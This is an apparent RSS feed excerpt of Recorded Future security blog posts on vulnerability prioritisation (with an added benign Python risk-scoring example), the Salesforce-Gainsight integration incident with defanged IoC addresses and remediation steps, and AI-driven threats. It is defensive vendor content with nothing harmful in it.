                <li>CopyCop is scaling AI-driven influence operations globally. The Russian influence network known as CopyCop has created more than 300 fake media websites spanning North America, Europe, and beyond. The operation primarily uses AI-generated content to erode public trust and support for Ukraine.</li>
                <li>AI has become the new engine of manipulation. The network uses self-hosted large language models (LLMs) to mass-produce fabricated news stories, deepfakes, and fake fact-checking sites that imitate legitimate journalism.</li>
                <li>Transparency and intelligence are the best defenses. Governments, newsrooms, and enterprises can counter these operations through domain monitoring, content verification, and proactive intelligence sharing.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1c93c29bb7b4d4ad423829bf579d68521a211553a.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[AI Malware: Hype vs. Reality]]></title>
            <link>https://www.recordedfuture.com/blog/ai-malware-hype-vs-reality</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/ai-malware-hype-vs-reality</guid>
            <pubDate>Mon, 01 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[A grounded look at AI malware: most threats sit at low maturity levels, with no verified autonomous BYOAI attacks. Learn what’s real, what’s hype, and how defenders should respond.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Takeaways</h2>
              <ul>
                <li>Most “AI malware” observed so far falls into the AI malware Maturity Model (AIM3) Levels 1-3 (Experimenting through Optimizing), rather than fully automated campaigns.</li>
                <li>AI is currently a force multiplier on existing attacker tradecraft, not a source of fundamentally new TTPs.</li>
                <li>Many “first-ever AI malware” announcements are narrow research demos or PoCs with limited autonomy and unclear real-world impact.</li>
                <li>Public reporting shows no confirmed examples of truly embedded, Bring-Your-Own-AI (BYOAI) malware running its own local model on victim hosts.</li>
                <li>Defenders should prioritize monitoring abuse of legitimate AI services, hardening existing controls, and mapping threats to AIM3 levels rather than overreacting to sci-fi scenarios.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1579402d5d0163bfc8366e1ac11f85c900262e0ec.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[How Ransomware Affects Business Operations, Revenue, and Brand Reputation]]></title>
            <link>https://www.recordedfuture.com/blog/how-ransomware-affects-businesses</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/how-ransomware-affects-businesses</guid>
            <pubDate>Mon, 01 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how ransomware works, how it can impact operations, revenue, and brand reputation, and how to prevent ransomware from infecting your business.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <h2>Key Takeaways</h2>
              <ul>
                <li>Ransomware disrupts business on multiple fronts, causing operational shutdowns, financial strain, and lasting reputational harm.</li>
                <li>Modern attacks rely on multi-stage intrusion tactics, from credential theft to data extortion, that exploit gaps across people, processes, and technology.</li>
                <li>Recovery is complex and prolonged, often requiring sustained operational, legal, and communications efforts.</li>
                <li>Intelligence-led visibility is the most effective defense, enabling teams to anticipate ransomware activity and respond with speed and precision.</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1070317ee0daef387ebb99c32488b01ea4632ecbf.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Integrating Threat Intelligence and Vulnerability Management: A Modern Approach]]></title>
            <link>https://www.recordedfuture.com/blog/threat-intelligence-and-vulnerability-management</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-intelligence-and-vulnerability-management</guid>
            <pubDate>Wed, 26 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how combining threat intelligence and vulnerability management creates a modern approach to risk reduction and how Recorded Future integrates both.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Traditional vulnerability management (VM) overwhelms teams with undifferentiated findings; integrating threat intelligence adds real-world context so you can fix what’s actually being targeted first.</li>
          <li>Threat intelligence-enriched, risk-based prioritization reduces MTTR, aligns with business risk, and moves programs from reactive to proactive.</li>
          <li>A modern approach uses automated risk scoring, dashboards, and workflow integrations to operationalize intelligence inside existing VM processes.</li>
          <li>Recorded Future’s Vulnerability Intelligence provides real-time risk scoring, exploitability insights, and integrations with leading VM platforms to drive action.</li>
        </ul>
        <h2>Introduction</h2>
        <p>In today’s threat landscape, security teams struggle under the growing challenge of vulnerability overload. Dozens of new CVEs are disclosed daily, spanning a wide diversity of technologies—<a href="https://www.cve.org/about/Metrics">over 40,000 were published in 2024 alone</a>. Without strong organization, prioritization, and visibility, this flood of vulnerabilities can overwhelm remediation teams and leave truly dangerous gaps unaddressed. Teams need a way to separate noise from risk and focus effort where it counts. Without comprehensive visibility and well-defined workflows, organizations have no way of knowing which vulnerabilities matter most, and remediation stalls.</p>
        <p>Risk-based prioritization—especially when grounded in threat context—keeps patching aligned with real-world attacker activity and an organization’s most critical assets. This is where threat intelligence changes the game. By adding insight on active exploits, attacker interest, and malware associations to vulnerability data, teams can identify which issues are actively being targeted and prioritize those first. The result is a modern, intelligence-driven approach to vulnerability management that bridges the gap between endless vulnerability lists and actual risk reduction.</p>
        <h2>Understanding Threat Intelligence and Vulnerability Management</h2>
        <p>Before organizations can modernize their approach to vulnerability management, it’s important to understand the two core disciplines involved, and the limitations that emerge when they operate independently. Threat intelligence and vulnerability management are both essential to reducing cyber risk, but too often weak integration keeps teams from acting on intelligence to actually get ahead of critical vulnerabilities. To appreciate the value of integrating threat intelligence with vulnerability management, let’s define each discipline and their traditional limitations:</p>
        <ul>
          <li>Threat Intelligence: Threat intelligence refers to curated information about malicious actors, their tactics, and emerging attacks that helps defenders make informed decisions. Threat Intelligence encompasses data on indicators of compromise, adversary techniques, and observed exploits in the wild. The goal is to understand the current threat landscape and anticipate how attackers might strike next.</li>
          <li>Vulnerability Management (VM): Vulnerability management is the process of systematically identifying, assessing, and remediating weaknesses (software bugs, misconfigurations, etc.) in an organization’s systems. Traditional VM programs rely on network scanners and inventory databases to discover vulnerabilities, assign severity scores (e.g. CVSS), and then patch or mitigate the issues based on priority. The standard VM cycle involves scanning for known CVEs, producing a list of findings, fixing what you can, and then rescanning to verify fixes.</li>
        </ul>
        <h3>The Limitations of Siloed Approaches</h3>
        <p>When the two disciplines operate in silos, a major gap exists between finding vulnerabilities and actually reducing risk. VM tools excel at detecting thousands of issues, but without threat context they can’t tell which of those hundreds of critical CVEs truly pose a real risk to your organization. This often leads teams to fix issues based purely on CVSS severity or ease of patching—a numbers-driven approach that may leave actively exploited vulnerabilities unpatched. Meanwhile, threat intelligence teams might be tracking dangerous new exploits or adversary campaigns, but if that intel isn’t linked to the VM process, it never informs patch prioritization. The two teams operate on parallel tracks, missing the synergy needed to combat real threats.</p>
        <p>Without integrating threat intelligence and VM, there’s <a href="https://www.recordedfuture.com/blog/closing-vulnerability-gaps">a dangerous disconnect</a>—critical vulnerabilities may linger unaddressed because the VM team lacks insight into real-world threat activity, and threat intel may be under-leveraged without an established path to inform remediation efforts.</p>
        <h2>Challenges of Traditional Vulnerability Management</h2>
        <p>Even the most well-resourced teams struggle to keep pace with today’s vulnerability landscape. The sheer volume of findings, the limited context available, and the pressure to act quickly all create structural weaknesses in traditional VM programs. Key issues include:</p>
        <h3>An Overwhelming Volume of CVEs</h3>
        <p>Modern organizations face an avalanche of vulnerabilities. Each vulnerability scan can return hundreds or thousands of findings, and new CVEs are disclosed at a record pace every year. This sheer volume makes it impractical for teams to patch everything, but without further guidance, many vulnerability managers feel pressure to fix as much as possible and use raw counts of patched bugs as a success metric. The result is often firefighting and fatigue. Additionally, using volume-based metrics rather than those tied to impact reduces the credibility of your VM program.</p>
        <h3>Lack of Real-World Threat Context</h3>
        <p>Traditional VM programs typically prioritize based on static severity scores (CVSS) or vendor guidance, which show how critical a vulnerability would be if exploited, but do not reflect whether attackers are actively targeting it. A flaw might be rated 9.8 “critical” on CVSS, but if no threat actors are targeting it, it poses less immediate risk than a 7.0 “high” that’s being widely exploited in the wild. Without <a href="https://www.recordedfuture.com/products/threat-intelligence">threat intelligence</a>, vulnerability managers lack insight into which vulnerabilities are featured in exploit kits, mentioned on dark web forums, or being leveraged in recent breaches.</p>
        <h3>Resource Constraints in Remediation Teams</h3>
        <p>Most security and IT teams simply don’t have enough personnel or downtime to remediate every vulnerability promptly. Legacy vulnerability management often operates on a reactive model—scan, list, and attempt to patch—which can overwhelm teams. They must triage an endless queue of patches, schedule maintenance windows, and avoid disrupting critical systems. With limited staff, it’s common for patch backlogs to grow.</p>
        <h3>Reactive vs. Proactive Posture</h3>
        <p>Reactive approaches are driven by periodic scan reports or the latest security bulletin. Organizations may only discover a need to patch when the scanner flags a new CVE—or worse, when an incident responder finds that attackers exploited a missing patch. In fact, threat actors are getting faster at exploiting new flaws—it often takes only around <a href="https://www.recordedfuture.com/blog/closing-vulnerability-gaps">15 days</a> for an exploit to appear in the wild once a vulnerability is disclosed. This means a purely reactive patch cycle leaves a dangerous exposure window. The key challenge is shifting out of react mode and into a more proactive, <a href="https://www.recordedfuture.com/blog/enhancing-vulnerability-management">intelligence-informed strategy</a> that addresses likely threats before they strike, ultimately helping to close those vulnerability gaps.</p>
        <h2>How Threat Intelligence Strengthens Vulnerability Management</h2>
        <p>Threat intelligence adds a critical dimension that traditional VM tools simply can’t provide: a real-time view of attacker behavior. This context transforms raw vulnerability data into something actionable, allowing teams to focus their attention on the issues that genuinely matter. By weaving threat intelligence into the VM lifecycle, organizations can meaningfully elevate their defenses.</p>
        <p>By incorporating threat intelligence, vulnerability management teams gain up-to-the-minute awareness of which vulnerabilities are being actively exploited or discussed by attackers. Knowing that a given CVE is being used to target your industry, leveraged in ransomware attacks, or scanned for by adversaries elevates its priority dramatically. Such context allows you to focus remediation on the vulnerabilities most likely to impact your organization’s systems.</p>
        <p>Meanwhile, intelligence enables a shift from a purely severity-based approach to a risk-based vulnerability management strategy. Instead of treating all “critical” CVEs as equal, teams combine internal asset criticality with external threat likelihood to calculate risk. By fusing threat intel (exploit availability, attacker interest, trending malware) with vulnerability data, organizations can remediate the vulnerabilities that pose the greatest real-world risk first, dramatically reducing the chances of breach.</p>
        <p>With better prioritization and context, security teams can respond faster to the vulnerabilities most dangerous to their specific organization. Threat intelligence acts as an early-warning system. It can alert you to a new critical CVE that’s being weaponized in the wild days or weeks before official sources might highlight it. That lead time means patches or mitigations can be applied sooner, shrinking the window of exposure.</p>
        <p>Finally, threat intelligence helps translate the technical details of vulnerabilities into business impact terms, improving communication with leadership and other stakeholders. By understanding which vulnerabilities could actually disrupt the business, security teams can better convey urgency to management and get support for emergency patches or downtime. Integrating threat intelligence also fosters alignment between the threat intel analysts and the vulnerability management/IT teams. Ultimately, intelligence-driven VM ensures that vulnerability prioritization maps to <a href="https://www.recordedfuture.com/blog/how-security-leaders-defend-their-attack-surface">the organization’s highest risks</a> and threat scenarios, rather than an abstract severity rating.</p>
        <h2>Benefits of an Integrated Cybersecurity Approach</h2>
        <p>Bringing threat intelligence and vulnerability management together doesn’t just streamline workflows — it reshapes how organizations reduce risk. Integrated programs operate with clearer priorities, faster response times, and better alignment across teams. Understanding these benefits helps illustrate why more enterprises are shifting toward a unified strategy.</p>
        <h3>Focused Resource Allocation (Focus on What Matters)</h3>
        <p>An integrated approach ensures your team’s limited time and effort are spent where it truly counts. Rather than patching vulnerabilities arbitrarily or in numeric order, you can concentrate on the subset that intelligence deems most dangerous. This better allocation of resources means important patches happen faster, and staff aren’t burning cycles on low-risk items.</p>
        <h3>Proactive Risk Mitigation</h3>
        <p>Combining threat intelligence with vulnerability management transforms the program from reactive to proactive. You’re not just responding to scanner reports or waiting for a breach to highlight a missed patch. You’re actively watching threat trends and preemptively fortifying systems against likely attacks. This proactive risk mitigation can stop incidents before they occur.</p>
        <h3>Improved Reporting and Compliance</h3>
        <p>An intelligence-informed VM process provides richer data for reporting up to executives or auditors. Security leaders can demonstrate not just how many vulnerabilities were patched, but how the fixes that were implemented strategically reduce risk to critical assets and keep the organization ahead of active threats. Additionally, integrating threat intelligence can strengthen compliance posture by ensuring that high-risk vulnerabilities (which often map to regulatory red flags) are dealt with promptly, thereby addressing key requirements in standards like ISO 27001, NIST CSF, or industry-specific guidelines.</p>
        <h3>Cross-Team Collaboration</h3>
        <p>When threat intelligence and vulnerability management are integrated, it breaks down silos between the teams that discover threats and those that fix them. Intelligence analysts, incident responders, vulnerability managers, and IT operations start to work from a common playbook informed by shared data. Threat intel might flag a critical new exploit; the VM team then rapidly assesses exposure and deploys patches; IT ops coordinates any system impacts, all in a coordinated workflow.</p>
        <h2>Practical Steps for Integration</h2>
        <p>Integrating threat intelligence into your VM program doesn’t require a complete overhaul. It’s a series of deliberate, achievable improvements. The key is knowing where intelligence can enhance existing workflows and how to introduce automation without disrupting core processes. These actionable steps provide a roadmap for making that transition smoothly.</p>
        <ol>
          <li><strong>Map Existing Workflows:</strong> Begin by documenting your current vulnerability management process and how information flows (or doesn’t) between the VM team and threat intelligence team. Understand your scan schedule, patch management cycle, and how decisions are made. Similarly, map out how threat intelligence is collected and disseminated in your organization.</li>
          <li><strong>Integrate Threat Intelligence Feeds and Platforms:</strong> Connect external threat intelligence sources into your vulnerability management tooling. This can be done through threat intelligence feeds integrated directly into your VM software.</li>
          <li><strong>Automate Prioritization with Risk Scoring:</strong> Leverage automated risk scoring systems that combine vulnerability data with threat intelligence to rank vulnerabilities. Dynamic risk scores (such as Recorded Future’s risk score, Microsoft’s MSRC ratings, or community metrics like CISA’s KEV and EPSS) can update continuously based on new intel. Set up your workflow so that newly discovered vulnerabilities are automatically scored for risk and use these scores to automatically reorder your patch queue.</li>
          <li><strong>Create Dashboards for Real-Time Monitoring:</strong> Develop dashboards or reports that give a consolidated, real-time view of your organization’s vulnerability risk landscape. These dashboards should blend vulnerability scanning results with threat intelligence indicators. Security operations center (SOC) analysts can monitor such a dashboard to catch critical intel updates. If a new exploit is detected for a CVE present in your network, it can be flagged immediately. Dashboards provide ongoing visibility and help both technical teams and executives understand the state of vulnerability risk at a glance.</li>
          <li><strong>Continuously Refine Based on Threat Trends:</strong> Integration is not a one-and-done project. It requires <a href="https://www.recordedfuture.com/blog/5-ways-take-vulnerability-management-program-next-level">continuous improvement</a>. Establish a feedback loop where after each patch cycle or major threat event, the teams review what was learned. Did threat intelligence correctly predict which vulnerabilities were most important? Were there incidents that revealed a missed vulnerability despite available intel? Use these insights to adjust your processes. Threat trends evolve constantly, so your integrated program should adapt.</li>
        </ol>
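        <p>The risk-scoring step above, as an added example that is not Recorded Future code: it combines CVSS with exploitation evidence (KEV listing, an EPSS-style probability, a circulating PoC) and internal asset criticality, so that an actively exploited 7.0 "high" outranks an unexploited 9.8 "critical". The findings, CVE placeholders and weights are constructed for illustration.</p>

```python
"""Threat-informed patch-queue ordering (added example, not Recorded Future code).

Static severity alone (CVSS) says how bad a flaw would be if exploited; the
exploitation signals say whether anyone is actually exploiting it. Weighting
both, plus asset criticality, reorders the queue the way the article describes.
All sample findings, identifiers and weights below are constructed.
"""
from dataclasses import dataclass


@dataclass
class Finding:
    cve: str                # placeholder identifier, not a real CVE
    cvss: float             # CVSS base score, 0.0 - 10.0
    epss: float             # EPSS-style exploitation probability, 0.0 - 1.0
    in_kev: bool            # listed in CISA KEV (known exploited)
    public_poc: bool        # proof-of-concept exploit circulating
    asset_criticality: int  # 1 (low) - 5 (crown jewel), from the asset inventory
    hosts: int              # affected hosts in the environment


def risk_score(f: Finding) -> float:
    """Return a 0-100 threat-informed risk score.

    Illustrative weights: severity contributes at most 40 points, exploitation
    evidence at most 40, asset criticality at most 20.
    """
    severity = (f.cvss / 10.0) * 40.0
    # KEV listing is the strongest exploitation signal; otherwise scale by
    # EPSS probability and add a fixed bump when a public PoC exists.
    if f.in_kev:
        exploitation = 40.0
    else:
        exploitation = f.epss * 30.0 + (10.0 if f.public_poc else 0.0)
    criticality = (f.asset_criticality / 5.0) * 20.0
    return round(severity + exploitation + criticality, 1)


def explain(f: Finding) -> list[str]:
    """Human-readable reasons behind the score, for the analyst's dashboard."""
    reasons = []
    if f.in_kev:
        reasons.append("listed in CISA KEV")
    if f.public_poc:
        reasons.append("public PoC circulating")
    if f.epss >= 0.5:
        reasons.append(f"EPSS {f.epss:.2f}")
    if f.asset_criticality >= 4:
        reasons.append("present on business-critical asset")
    return reasons or ["no exploitation evidence"]


def cvss_only(findings: list[Finding]) -> list[Finding]:
    """The traditional ordering: highest CVSS first."""
    return sorted(findings, key=lambda f: f.cvss, reverse=True)


def prioritize(findings: list[Finding]) -> list[Finding]:
    """Threat-informed ordering: highest risk first, ties broken by host count."""
    return sorted(findings, key=lambda f: (risk_score(f), f.hosts), reverse=True)


# Constructed sample findings (placeholder CVE identifiers).
SAMPLE_FINDINGS = [
    Finding("CVE-XXXX-0001", 9.8, 0.02, False, False, 2, 40),   # critical, nobody exploiting it
    Finding("CVE-XXXX-0002", 7.0, 0.85, True, True, 5, 12),     # high, in KEV, on a crown jewel
    Finding("CVE-XXXX-0003", 8.1, 0.40, False, True, 3, 200),   # high, PoC circulating
    Finding("CVE-XXXX-0004", 5.3, 0.01, False, False, 1, 500),  # medium, noise
]

if __name__ == "__main__":
    print("CVSS-only order:      ", [f.cve for f in cvss_only(SAMPLE_FINDINGS)])
    print("Threat-informed order:", [f.cve for f in prioritize(SAMPLE_FINDINGS)])
    for f in prioritize(SAMPLE_FINDINGS):
        print(f"{f.cve}: risk {risk_score(f):5.1f} -> {', '.join(explain(f))}")
```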
        <h2>Recorded Future: Taking a Holistic Cybersecurity Approach</h2>
        <p>Recorded Future’s Intelligence Platform is designed to bridge the gap between threat intelligence and vulnerability management, enabling a truly holistic approach to cyber risk reduction. With Recorded Future’s <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> module, organizations get real-time, contextual intelligence on vulnerabilities integrated directly into their workflows:</p>
        <ul>
          <li><strong>Real-Time Risk Scoring and Alerts:</strong> Recorded Future provides a dynamic risk score for each emerging vulnerability, updated in real time based on factors like active exploit availability, mentions by threat actors, links to malware (e.g. ransomware), and underground chatter. Instead of relying solely on CVSS, security teams see a threat-informed risk rating that tells them which vulnerabilities require immediate action.</li>
          <li><strong>Actionable Context and Intelligence:</strong> Each vulnerability entry in the platform comes enriched with context. Analysts can quickly see if a vulnerability has known ties to adversaries or malware, if there are references in dark web sources, or if a proof-of-concept exploit is circulating. Recorded Future’s <a href="https://www.recordedfuture.com/platform/intelligence-graph">Intelligence Graph®</a> correlates data from across the open web, dark web, technical sources, and its own research to paint a full picture.</li>
          <li><strong>Integration with VM Tools and Workflows:</strong> Recorded Future integrates with leading security solutions to reduce friction, including vulnerability management systems like Tenable and Qualys, IT service management platforms like ServiceNow, and SIEMs like Splunk, eliminating tool-switching. Integrations cover both sending threat intelligence to other tools and bringing data into the Recorded Future Platform. Automatic Watch List connectors, like our <a href="https://support.recordedfuture.com/hc/en-us/articles/35816048426643-Recorded-Future-Watch-List-Connector-for-Tenable-Vulnerability-Management-Getting-Started">Tenable Connector</a>, automatically sync scan data to your Recorded Future Vulnerability Watch List, ensuring teams are continuously monitoring an up-to-date list of exposures currently in their tech stack. Additionally, our flexible API and browser extension support custom integrations for unique systems.</li>
        </ul>
        <p>With these capabilities, Recorded Future helps organizations prioritize remediation with actionable intelligence, saving hours of manual research and significantly reducing the exposure window for high-risk vulnerabilities. Recorded Future empowers you to move from reactive vulnerability management to a threat-informed, efficient, and ultimately more effective program.</p>
        <h2>Best Practices for a Modern Program</h2>
        <p>Even with the right tools, success relies on following best practices that maximize the impact of an intelligence-driven vulnerability management program. Here are some best practices for a modern, integrated VM program:</p>
        <ul>
          <li><strong>Adopt Continuous Monitoring Over Periodic Scanning:</strong> Rather than scanning for vulnerabilities once a month or quarter, shift to continuous or at least more frequent discovery. Threats evolve quickly, and new critical vulnerabilities can’t wait for the next scheduled scan. Use a combination of persistent scanning, agent-based monitoring, and third-party intelligence to achieve near-real-time visibility of new vulnerabilities in your environment.</li>
          <li><strong>Align Patching with Business-Critical Assets:</strong> Not all assets are equal, and neither are vulnerabilities on those assets. Inventory your most critical applications, systems, and data, and incorporate that knowledge into your prioritization. Prioritize fixes that protect what matters most to the business.</li>
          <li><strong>Foster Collaboration Between Teams:</strong> Encourage regular communication and joint processes between the vulnerability management team, threat intelligence analysts, incident responders, and even application developers. Breaking down silos ensures that everyone understands the bigger picture of risk and works together. It also helps in getting buy-in from IT and development teams on urgent patching: when they hear directly from threat intelligence about the potential fallout of not patching, it adds urgency beyond a typical IT ticket.</li>
          <li><strong>Measure Success with Metrics:</strong> To continually improve and demonstrate value, track metrics that gauge both the efficiency and effectiveness of your vulnerability management program. Key metrics might include:
            <ul>
              <li>Mean Time to Remediation (MTTR) for critical vulnerabilities (are you patching faster as integration matures?)</li>
              <li>Number of exploitable vulnerabilities remaining unpatched (is that trending down?)</li>
              <li>Reduction in overall attack surface (perhaps measured by fewer findings on repeat scans or a drop in high-risk exposure as scored by your intel)</li>
              <li>Compliance metrics like patch SLAs met</li>
              <li>How often threat intelligence inputs lead to preventive action</li>
            </ul>
          </li>
        </ul>
        <h2>Smarter Vulnerability Management with Threat Intelligence</h2>
        <p>Integrating threat intelligence with vulnerability management is a fundamental modernization of how an organization manages cyber risk. By infusing real-world context and automation into the VM process, security teams can make smarter decisions: they fix the vulnerabilities that are most likely to be used in an attack, and they fix them faster and more efficiently than before. The result is a vulnerability management program that is not only more accurate but also more agile and resilient in the face of today’s fast-moving threat landscape.</p>
        <p>Ready to take your vulnerability management to the next level? Recorded Future’s Vulnerability Intelligence solution can help you get there. With real-time threat insights, automated risk scoring, and seamless integration into your existing tools, it provides everything you need to proactively reduce risk.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1fe2745ec5c98b330e2b284e21463d56ecf50bbe9.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[The Salesforce-Gainsight Security Incident: What You Need to Know]]></title>
            <link>https://www.recordedfuture.com/blog/salesforce-gainsight-security-incident</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/salesforce-gainsight-security-incident</guid>
            <pubDate>Wed, 26 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how threat intelligence identifies supply-chain compromise risks in SaaS integrations and how Recorded Future helps organizations defend against attacks like the Salesforce-Gainsight incident.]]></description>
            <content:encoded><![CDATA[
        <p>On November 23, 2025, Gainsight confirmed that it’s actively investigating unusual activity involving its applications that are integrated with Salesforce—an incident that underscores the growing risk of supply-chain compromise through trusted SaaS integrations.</p>
        <h2>What happened</h2>
        <p>The security event came to light on November 19, when Salesforce detected suspicious API calls. The calls originated from non-allowlisted IP addresses through Gainsight applications integrated with Salesforce. To date, three unnamed customers are suspected to have been impacted. In response, Salesforce immediately <a href="https://help.salesforce.com/s/articleView?id=005229029&amp;type=1">revoked</a> access tokens associated with Gainsight applications, restricted integration functionality, and launched an investigation.</p>
        <p>The incident disrupted several Gainsight services, including Customer Success (CS), Community, Northpass, Skilljar, and Staircase, temporarily disabling their ability to read and write data from Salesforce. As a precautionary measure, other platforms, including Zendesk, Gong.io, and HubSpot, also disabled related CS connectors.</p>
        <h2>The threat landscape connection</h2>
        <p>Analysis of the indicators of compromise (IoCs) revealed concerning patterns. Some IP addresses involved in this incident, such as 109.70.100[.]68 and 109.70.100[.]71, were previously linked to an August 2025 campaign in which the financially motivated threat cluster UNC6040 compromised Salesforce CRM environments to exfiltrate sensitive data, indicating possible reuse of infrastructure against CRM targets. The August 2025 campaign reportedly coordinated with UNC6240, which claimed affiliation with the ShinyHunters extortion group, to demand payment from affected organizations.</p>
        <p>Most of the IP addresses identified are Tor exit nodes or commodity proxy/VPN infrastructure with histories of abuse for malicious activities, including scanning, brute-force attacks, and web exploitation. This suggests that the threat actors are using shared anonymity services rather than custom command-and-control (C2) infrastructure.</p>
        <p>Intelligence analysis also revealed malware samples communicating with these IP addresses across commodity families, including SmokeLoader, Stealc, DCRat, and Vidar.</p>
        <p>While Gainsight has stated that it hasn’t identified evidence of data exfiltration, and while a specific threat actor has yet to be confirmed, the investigation is ongoing.</p>
        <h2>The broader risk: supply-chain compromise</h2>
        <p>This incident highlights a critical vulnerability in modern enterprise architecture: the risk of supply-chain compromise through trusted SaaS integrations. When OAuth tokens, API keys, and service accounts enable persistent access to enterprise CRM data, a breach in one connected application can potentially expose sensitive information across multiple platforms.</p>
        <p>Despite no evidence of data exfiltration so far, customers using Gainsight-Salesforce integrations may face unauthorized access or credential misuse until proper reauthorization is completed. The potential exposure may extend beyond Gainsight to other connected applications, such as Zendesk, HubSpot, and Gong.io, that share authentication or data pipelines.</p>
        <h2>Immediate actions for affected organizations</h2>
        <p>Gainsight has already taken defensive measures, including rotating multi-factor credentials and restricting access to its VPN and critical infrastructure. However, customers who suspect exposure should consider taking the following actions:</p>
        <p><strong>Critical security steps:</strong></p>
        <ul>
          <li>Revoke and rotate OAuth tokens and API keys associated with the Gainsight-Salesforce Connected App.</li>
          <li>Review Salesforce and Gainsight logs for anomalous API traffic, unexpected IP sources, or mass data exports.</li>
          <li>Apply IP allowlists to block connections from published IoCs.</li>
          <li>Implement conditional access and device trust validation for all connected apps.</li>
          <li>Enforce multi-factor authentication and reset access credentials on all privileged accounts.</li>
          <li>Isolate integrations with third-party vendors until reauthorization guidance is confirmed.</li>
        </ul>
        <p><strong>Gainsight-specific recommendations:</strong></p>
        <ul>
          <li>Rotate S3 keys.</li>
          <li>Reset NXT passwords.</li>
          <li>Reauthorize affected integrations.</li>
          <li>Log in directly to NXT until the Salesforce Connected App is fully restored.</li>
        </ul>
        <h2>Looking ahead</h2>
        <p>As organizations increasingly rely on interconnected SaaS applications to power their operations, the security posture of each integration point becomes critical. This incident serves as a reminder that third-party applications with deep integrations into core business systems represent both operational efficiency and potential attack vectors.</p>
        <p>Organizations should evaluate their connected application ecosystems, implement zero-trust principles for API access, and ensure robust monitoring of authentication and authorization activities across all integrated platforms. The days of "set and forget" SaaS integrations are over. Continuous validation and monitoring are essential to maintaining security in a connected enterprise environment.</p>
        <p>Learn how to stay ahead of emerging threats. <a href="https://www.recordedfuture.com/get-started">Contact us to speak with one of our threat intelligence experts</a>.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_15cf75aa353a7a05bd6cc1128d100e4b5e41b5367.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Choosing a Digital Risk Intelligence Platform: 5 Key Capabilities to Evaluate]]></title>
            <link>https://www.recordedfuture.com/blog/evaluating-digital-risk-intelligence-platforms</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/evaluating-digital-risk-intelligence-platforms</guid>
            <pubDate>Mon, 24 Nov 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Evaluating digital risk intelligence platforms? Learn the 5 essential capabilities you should consider in order to protect your brand, assets, and attack surface.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>The traditional “digital perimeter” paradigm for enterprise cybersecurity is no longer relevant in today’s online landscape. Instead of defending one’s internal network from the outside world, organizations must shift to a model of digital risk that takes into account every possible point of compromise.</li>
          <li>Given the continuous influx of alerts and data facing organizations today, an effective digital risk intelligence platform is an essential component of enterprise cybersecurity, and selecting the right one is of mission-critical importance to an organization’s overall security posture.</li>
          <li>When selecting a digital risk management platform, organizations should prioritize the following five key capabilities:
            <ul>
              <li>Visibility</li>
              <li>Comprehensive brand and executive intelligence</li>
              <li>Third-party and supply chain oversight</li>
              <li>Credential monitoring</li>
              <li>Integration and contextualization</li>
            </ul>
          </li>
          <li>Recorded Future’s Intelligence Cloud platform provides the kind of comprehensive, contextualized, and integrated view that organizations require to manage digital risk effectively in today’s threat landscape.</li>
        </ul>
        <h2>Your Biggest Security Blind Spot is Now the Entire Internet</h2>
        <p>The “security perimeter” is a long-standing and deeply ingrained idea in enterprise cybersecurity. However, what was once defined as the boundary protecting your organization’s internal network from the outside world is no longer a useful measure for understanding security posture. Today, the average organization’s actual attack surface is sprawling, variable and amorphous, consisting of every social media profile, cloud bucket, line of code in a third-party app, employee credential, and more.</p>
        <p>Anywhere and everywhere your organization and its employees operate online represents a potential point of entry or compromise. And maintaining visibility into the various exposures, threats, and risks looming over that attack surface is incredibly difficult. Most security teams are drowning in disparate alerts coming from siloed systems, struggling to keep up with and make sense of them all.</p>
        <p>Ultimately, this results in a situation in which teams lack a complete, holistic view and understanding of their <a href="https://www.recordedfuture.com/use-case/digital-risk">state of digital risk</a>. Digital risk is defined as the potential for financial loss, disruption, or reputational damage resulting from the digital technologies, data breaches, cyberattacks, or failures in IT systems and digital processes. It encompasses any threat that arises from an organization’s use of digital tools and platforms.</p>
        <p>With so much to safeguard, and so much information to sift through, organizations must find more effective ways to quickly and accurately separate signal from noise. Central to this effort is finding a digital risk management platform that is able to deliver timely, unified, contextualized, and actionable intelligence—not just streams of data—to your team.</p>
        <p>The following guide outlines the five mission-critical capabilities your digital risk management platform must have in order to keep pace with today’s perimeterless threat landscape.</p>
        <h2>5 Key Capabilities Your Digital Risk Management Platform Can’t Go Without</h2>
        <p>Evaluating a digital risk platform’s true value comes down to the following five core functions. Lacking even one of these creates a critical capabilities gap and can compromise your organization’s security posture in significant ways:</p>
